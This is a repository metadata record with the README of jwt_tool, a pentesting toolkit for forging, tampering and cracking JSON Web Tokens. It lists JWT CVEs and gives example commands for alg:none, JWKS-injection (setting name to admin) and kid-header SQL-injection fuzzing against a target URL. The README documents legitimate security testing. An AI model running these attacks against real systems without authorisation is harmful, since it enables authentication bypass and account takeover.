{"id":13540209,"url":"https://github.com/ticarpi/jwt_tool","last_synced_at":"2025-05-14T13:08:37.251Z","repository":{"id":37445305,"uuid":"79848747","full_name":"ticarpi/jwt_tool","owner":"ticarpi","description":":snake: A toolkit for testing, tweaking and cracking JSON Web Tokens","archived":false,"fork":false,"pushed_at":"2025-05-01T10:54:30.000Z","size":227,"stargazers_count":5783,"open_issues_count":66,"forks_count":701,"subscribers_count":63,"default_branch":"master","last_synced_at":"2025-05-01T11:20:06.680Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ticarpi.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2017-01-23T21:13:50.000Z","updated_at":"2025-05-01T10:54:34.000Z","dependencies_parsed_at":"2024-05-29T00:30:50.959Z","dependency_job_id":"16af23e1-b0c9-4cdf-b372-b2f31332da43","html_url":"https://github.com/ticarpi/jwt_tool","commit_stats":null,"previous_names":[],"tags_count":12,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ticarpi%2Fjwt_tool","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ticarpi%2Fjwt_tool/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ticarpi%2Fjwt_tool/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ticarpi%2Fjwt_tool/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ticarpi","download_url":"https://codeload.github.com/ticarpi/jwt_tool/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254149974,"owners_count":22022852,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T09:01:42.748Z","updated_at":"2025-05-14T13:08:32.221Z","avatar_url":"https://github.com/ticarpi.png","language":"Python","readme":"# The JSON Web Token Toolkit v2\n\u003e*jwt_tool.py* is a toolkit for validating, forging, scanning and tampering JWTs (JSON Web Tokens).  \n\n![jwt_tool version](https://img.shields.io/badge/version-v2.2.7-blue) ![python version](https://img.shields.io/badge/python-v3.6+-green)\n\n![logo](https://user-images.githubusercontent.com/19988419/100555535-18598280-3294-11eb-80ed-ca5a0c3455d6.png)\n\nIts functionality includes:\n* Checking the validity of a token\n* Testing for known exploits:\n  * (CVE-2015-2951) The ***alg=none*** signature-bypass vulnerability\n  * (CVE-2016-10555) The ***RS/HS256*** public key mismatch vulnerability\n  * (CVE-2018-0114) ***Key injection*** vulnerability\n  * (CVE-2019-20933/CVE-2020-28637) ***Blank password*** vulnerability\n  * (CVE-2020-28042) ***Null signature*** vulnerability\n* Scanning for misconfigurations or known weaknesses\n* Fuzzing claim values to provoke unexpected behaviours\n* Testing the validity of a secret/key file/Public Key/JWKS key\n* Identifying ***weak keys*** via a High-speed ***Dictionary Attack***\n* Forging new token header and payload contents and creating a new signature with the **key** or via another attack method\n* Timestamp tampering\n* RSA and ECDSA key generation, and reconstruction (from JWKS files)\n* ...and lots more!\n\n---\n\n## Audience\nThis tool is written for **pentesters**, who need to check the strength of the tokens in use, and their susceptibility to known attacks. A range of tampering, signing and verifying options are available to help delve deeper into the potential weaknesses present in some JWT libraries.  \nIt has also been successful for **CTF challengers** - as CTFs seem keen on JWTs at present.  \nIt may also be useful for **developers** who are using JWTs in projects, but would like to test for stability and for known vulnerabilities when using forged tokens.\n\n---\n\n## Requirements\nThis tool is written natively in **Python 3** (version 3.6+) using the common libraries, however various cryptographic funtions (and general prettiness/readability) do require the installation of a few common Python libraries.  \n*(An older Python 2.x version of this tool is available on the legacy branch for those who need it, although this is no longer be supported or updated)*\n\n---\n\n## Installation\n\n### Docker\nThe preferred usage for jwt_tool is with the [official Dockerhub-hosted jwt_tool docker image](https://hub.docker.com/r/ticarpi/jwt_tool)  \nThe base command for running this is as follows:  \nBase command for running jwt_tool:  \n`docker run -it --network \"host\" --rm -v \"${PWD}:/tmp\" -v \"${HOME}/.jwt_tool:/root/.jwt_tool\" ticarpi/jwt_tool`  \n\nBy using the above command you can tag on any other arguments as normal.  \nNote that local files in your current working directory will be mapped into the docker container's /tmp directory, so you can use them using that absolute path in your arguments.  \ni.e.  \n*/tmp/localfile.txt*\n\n### Manual Install\nInstallation is just a case of downloading the `jwt_tool.py` file (or `git clone` the repo).  \n(`chmod` the file too if you want to add it to your *$PATH* and call it from anywhere.)\n\n`$ git clone https://github.com/ticarpi/jwt_tool`  \n`$ python3 -m pip install -r requirements.txt`  \n\nOn first run the tool will generate a config file, some utility files, logfile, and a set of Public and Private keys in various formats.  \n\n### Custom Configs\n* To make best use of the scanning options it is **strongly advised** to copy the custom-generated JWKS file somewhere that can be accessed remotely via a URL. This address should then be stored in `jwtconf.ini` as the \"jwkloc\" value.  \n* In order to capture external service interactions - such as DNS lookups and HTTP requests - put your unique address for Burp Collaborator (or other alternative tools such as RequestBin) into the config file as the \"httplistener\" value.  \n***Review the other options in the config file to customise your experience.***\n\n### Colour bug in Windows\nTo fix broken colours in Windows cmd/Powershell: uncomment the below two lines in `jwt_tool.py` (remove the \"# \" from the beginning of each line)  \nYou will also need to install colorama: `python3 -m pip install colorama`\n```\n# import colorama\n# colorama.init()\n```\n---\n\n## Usage\nThe first argument should be the JWT itself (*unless providing this in a header or cookie value*). Providing no additional arguments will show you the decoded token values for review.  \n`$ python3 jwt_tool.py \u003cJWT\u003e`  \nor the Docker base command:  \n`$ docker run -it --network \"host\" --rm -v \"${PWD}:/tmp\" -v \"${HOME}/.jwt_tool:/root/.jwt_tool\" ticarpi/jwt_tool`  \n\nThe toolkit will validate the token and list the header and payload values.  \n\n### Additional arguments\nThe many additional arguments will take you straight to the appropriate function and return you a token ready to use in your tests.  \nFor example, to tamper the existing token run the following:  \n`$ python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw -T`  \n\nMany options need additional values to set options.  \nFor example, to run a particular type of exploit you need to choose the eXploit (-X) option and select the vulnerability (here using \"a\" for the *alg:none* exploit):  \n`$ python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw -X a`\n\n### Extra parameters\nSome options such as Verifying tokens require additional parameters/files to be provided (here providing the Public Key in PEM format):  \n`$ python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw -V -pk public.pem`  \n\n### Sending tokens to a web application\nAll modes now allow for sending the token directly to an application.  \nYou need to specify:  \n* target URL (-t)\n* a request header (-rh) or request cookies (-rc) that are needed by the application (***at least one must contain the token***)\n* (optional) any POST data (where the request is a POST)\n* (optional) any additional jwt_tool options, such as modes or tampering/injection options  \n* (optional) a *canary value* (-cv) - a text value you expect to see in a successful use of the token (e.g. \"Welcome, ticarpi\")  \nAn example request might look like this (using scanning mode for forced-errors):  \n`$ python3 jwt_tool.py -t https://www.ticarpi.com/ -rc \"jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test\" -rh \"Origin: null\" -cv \"Welcome\" -M er` \n\nVarious responses from the request are displayed:  \n* Response code\n* Response size\n* Unique request tracking ID (for use with logging)\n* Mode/options used\n\n---\n\n## Common Workflow\n\nHere is a quick run-through of a basic assessment of a JWT implementation. If no success with these options then dig deeper into other modes and options to hunt for new vulnerabilities (or zero-days!).  \n\n### Recon:  \nRead the token value to get a feel for the claims/values expected in the application:  \n`$ python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw`  \n\n### Scanning:\nRun a ***Playbook Scan*** using the provided token directly against the application to hunt for common misconfigurations:  \n`$ python3 jwt_tool.py -t https://www.ticarpi.com/ -rc \"jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test\" -M pb`  \n\n### Exploitation:\nIf any successful vulnerabilities are found change any relevant claims to try to exploit it (here using the *Inject JWKS* exploit and injecting a new username):  \n`$ python3 jwt_tool.py -t https://www.ticarpi.com/ -rc \"jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test\" -X i -I -pc name -pv admin` \n\n### Fuzzing:\nDig deeper by testing for unexpected values and claims to identify unexpected app behaviours, or run attacks on programming logic or token processing:  \n`$ python3 jwt_tool.py -t https://www.ticarpi.com/ -rc \"jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test\" -I -hc kid -hv custom_sqli_vectors.txt`  \n\n### Review:\nReview any successful exploitation by querying the logs to read more data about the request and :  \n`$ python3 jwt_tool.py -t https://www.ticarpi.com/ -rc \"jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test\" -X i -I -pc name -pv admin`   \n\n---\n\n### Help\nFor a list of options call the usage function:\nSome options such as Verifying tokens require additional parameters/files to be provided:  \n`$ python3 jwt_tool.py -h`\n\n**A more detailed user guide can be found on the [wiki page](https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool).**\n\n---\n\n## JWT Attack Playbook - new wiki content!  \n![playbook_logo](https://user-images.githubusercontent.com/57728093/68797806-21f25700-064d-11ea-9baa-c58fb6f75c0b.png)\n\nHead over to the [JWT Attack Playbook](https://github.com/ticarpi/jwt_tool/wiki) for a detailed run-though of what JWTs are, what they do, and a full workflow of how to thoroughly test them for vulnerabilities, common weaknesses and unintended coding errors.\n\n---\n\n## Tips\n**Regex for finding JWTs in Burp Search**  \n*(make sure 'Case sensitive' and 'Regex' options are ticked)*  \n`[= ]eyJ[A-Za-z0-9_-]*\\.[A-Za-z0-9._-]*` - url-safe JWT version  \n`[= ]eyJ[A-Za-z0-9_\\/+-]*\\.[A-Za-z0-9._\\/+-]*` - all JWT versions (higher possibility of false positives)\n\n---\n\n## Further Reading\n* [JWT Attack Playbook (https://github.com/ticarpi/jwt_tool/wiki)](https://github.com/ticarpi/jwt_tool/wiki) - for a thorough JWT testing methodology\n\n* [A great intro to JWTs - https://jwt.io/introduction/](https://jwt.io/introduction/)\n\n* A lot of the initial inspiration for this tool comes from the vulnerabilities discovered by Tim McLean.  \n[Check out his blog on JWT weaknesses here: https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/)  \n\n* A whole bunch of exercises for testing JWT vulnerabilities are provided by [Pentesterlab (https://www.pentesterlab.com)](https://www.pentesterlab.com). I'd highly recommend a PRO subscription if you are interested in Web App Pentesting.  \n\n  *PLEASE NOTE:* This toolkit will solve most of the Pentesterlab JWT exercises in a few seconds when used correctly, however I'd **strongly** encourage you to work through these exercises yourself, working out the structure and the weaknesses. After all, it's all about learning...\n","funding_links":[],"categories":["\u003ca id=\"de81f9dd79c219c876c1313cd97852ce\"\u003e\u003c/a\u003e破解\u0026\u0026Crack\u0026\u0026爆破\u0026\u0026BruteForce","Miscellaneous","Python","Python (1887)","\u003ca id=\"73c3c9225523cbb05333246f23342846\"\u003e\u003c/a\u003e工具","Weapons","Web Tools","Misc"],"sub_categories":["\u003ca id=\"f2c76d99a0b1fda124d210bd1bbc8f3f\"\u003e\u003c/a\u003eWordlist生成","JSON Web Token","\u003ca id=\"53084c21ff85ffad3dd9ce445684978b\"\u003e\u003c/a\u003e未分类的","Tools","Metadata Tools"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fticarpi%2Fjwt_tool","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fticarpi%2Fjwt_tool","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fticarpi%2Fjwt_tool/lists"}